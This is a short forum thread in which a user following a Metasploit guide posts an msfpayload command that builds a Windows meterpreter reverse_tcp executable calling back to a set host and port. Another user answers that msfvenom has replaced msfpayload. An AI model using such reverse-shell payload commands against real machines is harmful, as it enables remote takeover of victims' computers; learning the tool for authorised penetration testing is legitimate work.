Polymorphic Plague Posted March 7, 2016 Share Posted March 7, 2016 So, I'm following this guide and I have some problems: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit When I use this command, it will not accept it as a correct payload: ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 X > /tmp/iambad.exe The reverse_tcp does not seem to be a correct payload, how can I fix this? Quote Link to comment Share on other sites More sharing options...
Karel Origin Posted March 28, 2016 Share Posted March 28, 2016 Because msfpayload doesn't work anymore you need to use msfvenom Quote Link to comment Share on other sites More sharing options...
Polymorphic Plague Posted March 30, 2016 Author Share Posted March 30, 2016 Because msfpayload doesn't work anymore you need to use msfvenom Thank you man, now it works perfectly! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.